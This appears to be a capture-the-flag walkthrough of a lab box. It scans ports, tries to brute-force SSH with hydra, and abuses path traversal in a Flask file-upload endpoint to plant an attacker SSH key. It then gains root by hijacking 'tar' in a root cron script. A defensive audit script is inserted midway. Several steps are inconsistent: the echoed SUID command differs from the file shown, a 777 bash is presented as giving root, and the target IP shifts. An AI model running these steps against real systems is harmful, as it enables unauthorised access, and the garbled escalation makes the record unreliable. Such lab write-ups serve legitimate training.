Use ip a to get the attacking machine's IP > 192.168.45.168
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# sudo nmap --min-rate 10000 -p- 192.168.244.249
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:08 CST
Nmap scan report for 192.168.244.249
Host is up (0.26s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp closed ssh
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
2049/tcp closed nfs
10000/tcp closed snet-sensor-mgmt
25022/tcp open unknown
33414/tcp open unknown
40080/tcp open unknown
[! Ports gathered across the two scans ]
21,22,111,139,443,445,2049,10000,25022,33414,40080
# TCP probe
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# sudo nmap -sT -sV -O -sC -p21,22,111,139,443,445,2049,10000,25022,33414,40080 192.168.244.249
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:12 CST
Nmap scan report for 192.168.244.249
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.168
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
22/tcp closed ssh
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
2049/tcp closed nfs
10000/tcp closed snet-sensor-mgmt
25022/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 68:c6:05:e8:dc:f2:9a:2a:78:9b:ee:a1:ae:f6:38:1a (ECDSA)
|_ 256 e9:89:cc:c2:17:14:f3:bc:62:21:06:4a:5e:71:80:ce (ED25519)
33414/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/2.2.3 Python/3.9.13
| Date: Fri, 21 Jul 2023 16:12:42 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
|
|
| 404 Not Found
40080/tcp open http Apache httpd 2.4.53 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.53 (Fedora)
|_http-title: My test page
Overall, 4 ports are open: 21-ftp, 25022-ssh, 33414-tcp, 40080-http
From the FTP version information obtained by the Nmap probe, we can roughly infer the location of the FTP configuration file
# if the probed version is vsftpd 3.0.3
cat /etc/vsftpd.conf
Try logging in with the anonymous account and no password
# connect using the ftp protocol + IP
ftp 192.168.244.249
Name: anonymous
After logging in to FTP, use ls to see which directories exist, checking file permissions while browsing, and use GET to download files
# binary transfers files in binary mode so the file stays intact
ftp > binary
# view the directory structure
ftp > ls -al
Target: ssh 192.168.244.249:25022
Try brute-forcing the root account's password with hydra, using 4 threads (-t 4)
hydra -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.242.249 ssh -t4 -s 25022
Leave it running in the background and move on to the next item
The root password brute-force reported an error, so try manually
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ssh [email protected] -p 25022
[email protected]'s password:
Permission denied, please try again.
http://192.168.242.249:33414
According to the nmap results, 33414 is a TCP service that can be accessed over HTTP
At this point I did a quick chatgpt Q&A to find out what Werkzeug is, and decided to run a directory scan
Werkzeug is a Python WSGI toolkit for building web applications and frameworks. It provides a flexible set of tools for handling HTTP requests and responses, routing requests, managing sessions, debugging, and more.
dirsearch -u http://192.168.242.249:33414 -x 302,403
First check whether the help and info endpoints reveal anything; if not, consider leaving a deeper scan running
0 "GET /info : General Info"
1 "GET /help : This listing"
2 "GET /file-list?dir=/tmp : List of the files"
3 "POST /file-upload : Upload files"
Visiting http://192.168.242.249:40080 only shows a Firefox page. Explore 33414 first; it can be confirmed to have an upload feature
curl http://192.168.242.249:33414/file-upload
# GET is not allowed, so switch to POST
curl -X POST http://192.168.242.249:33414/file-upload
I asked chatgpt and the conclusion was that -F "file=@/path/to/file" is needed
# create a file
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# touch test.abcd
# upload
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" http://192.168.242.249:33414/file-upload
{"message":"No filename part in the request"}
# No filename part: a filename is required
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" -F filename=a http://192.168.242.249:33414/file-upload
{"message":"Allowed file types are txt, pdf, png, jpg, jpeg, gif"}
Adjust according to the requirement
# the uploaded filename must match the whitelist
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=a.txt http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
Checked where the uploaded file was placed and found it is under the /tmp directory
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/tmp
["a.txt",....]
If both upload and read are available, what exploitation routes are there?
The upload could overwrite certain files to let us log in; confirm whether the upload allows directory traversal
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=../a.txt http://192.168.242.249:33414/file-upload
500 Internal Server Error
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
The error says the request could not be completed, meaning it tried to write into the root directory and had no permission
Use the path listing to find useful write locations; besides tmp there should be user-owned places that are writable
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home
["alfredo"]
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo
[".bash_logout",".bash_profile",".bashrc","local.txt",".ssh","restapi",".bash_history"]
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh
["id_rsa","id_rsa.pub"]
There is a user alfredo with a .ssh folder; try whether that folder accepts uploads
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=/home/alfredo/.ssh/a.txt http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh
["id_rsa","id_rsa.pub","a.txt"]
Consider uploading the attacking machine's authorized_keys for the alfredo user and logging in over SSH with the key
First generate the corresponding key pair on the attacking machine
ssh-keygen -t rsa
...
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ls
text.txt text.txt.pub
Next, at the file upload point try uploading id_rsa_test.pub, using directory traversal to place it at /home/alfredo/.ssh/authorized_keys
# first change the extension to match the whitelist
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# mv text.txt.pub text.txt.txt
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ls
hydra.restore text.txt text.txt.txt
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/text.txt.txt" -F filename=/home/alfredo/.ssh/authorized_keys http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
With the key in place, log in specifying the key
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ssh -i text.txt [email protected] -p25022
Last login: Tue Mar 28 03:21:25 2023
[alfredo@fedora ~]$
[alfredo@fedora ~]$ find / -name local.txt 2>/dev/null
/home/alfredo/local.txt
[alfredo@fedora ~]$ cat /home/alfredo/local.txt
*****************************************
Look for files that can be run with sudo privileges without a password
# search with sudo -l
sudo -l
# -perm matches on file permission bits
[alfredo@fedora ~]$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/staprun
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/cockpit-session
Nothing particularly useful for privilege escalation found
# check for binaries carrying the CAP_SETUID capability
[alfredo@fedora ~]$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/newuidmap cap_setuid=ep
/usr/bin/arping cap_net_raw=p
/usr/bin/clockdiff cap_net_raw=p
/usr/sbin/suexec cap_setgid,cap_setuid=ep
/usr/sbin/mtr-packet cap_net_raw=ep
# look for scheduled tasks and modify them to escalate privileges
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/1 * * * * root /usr/local/bin/backup-flask.sh
backup-flask.sh is found to run once every minute
# check whether we can modify it
[alfredo@fedora ~]$ ls -al cat /usr/local/bin/backup-flask.sh
ls: cannot access 'cat': No such file or directory
-rwxr-xr-x. 1 root root 106 Mar 28 03:18 /usr/local/bin/backup-flask.sh
# view the contents
[alfredo@fedora ~]$ cat /usr/local/bin/backup-flask.sh
#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *
backup-flask.sh puts a directory under the user's home into PATH and then runs tar once
Because the user's environment is under our control, we create our own tar command so the scheduled task helps us escalate privileges
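An added audit check, not from the page or the box, written in Python to stay with the page's Werkzeug/Flask context: it scans a cron script for the two weaknesses backup-flask.sh shows, a user-writable directory prepended to PATH and a command (tar) invoked by bare name rather than by absolute path. The script text is embedded from the page as the sample input; the set of trusted prefixes and the function names are assumptions.

```python
import shlex

# Assumed trusted PATH locations for a root cron job: system-managed
# directories that ordinary users cannot write to.
TRUSTED = ("/usr/", "/bin/", "/sbin/")
BUILTINS = {"cd", "export", "exit", "set", "umask", "echo", "test", "true"}

# The cron script found on this page, embedded as constructed sample input.
BACKUP_FLASK_SH = """#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *
"""


def trusted_dir(entry):
    return (entry.rstrip("/") + "/").startswith(TRUSTED)


def audit_cron_script(text):
    """Return findings for a script executed from root's crontab: PATH entries
    outside the trusted system locations (any directory an unprivileged user
    could drop a binary into) and commands invoked by bare name, which the
    shell resolves through that PATH instead of a fixed absolute location."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                          # blank, comment or shebang
        tokens = shlex.split(line)
        if tokens[:1] == ["export"]:
            tokens = tokens[1:]
        if not tokens:
            continue
        name, sep, value = tokens[0].partition("=")
        if sep and not name.startswith("/"):  # variable assignment
            for entry in value.split(":") if name == "PATH" else []:
                if entry.startswith("$") or trusted_dir(entry):
                    continue                  # inherited ($PATH) or system dir
                findings.append(f"line {lineno}: PATH includes untrusted directory {entry}")
            continue
        if tokens[0] not in BUILTINS and not tokens[0].startswith("/"):
            findings.append(f"line {lineno}: '{tokens[0]}' resolved via PATH; use an absolute path")
    return findings
```

Run over the page's script it reports both lines 2 and 4; a script that calls /bin/tar with the system PATH untouched produces no findings.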
# check bash permissions
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxr-xr-x. 1 root root 1390080 Jan 25 2021 /bin/bash
# write a command that escalates bash by adding the SUID bit
[alfredo@fedora restapi]$ echo "chmod +u+s /bin/bash" > tar
[alfredo@fedora restapi]$ cat tar
chmod 777 /bin/bash
# add execute permission
[alfredo@fedora restapi]$ chmod +x tar
[alfredo@fedora restapi]$ cat tar
chmod 777 /bin/bash
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxrwxrwx. 1 root root 1390080 Jan 25 2021
# privileges escalated successfully
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxrwxrwx. 1 root root 1390080 Jan 25 2021 /bin/bash
# bash -p to obtain the privileges
[alfredo@fedora restapi]$ bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/proof.txt
**********************************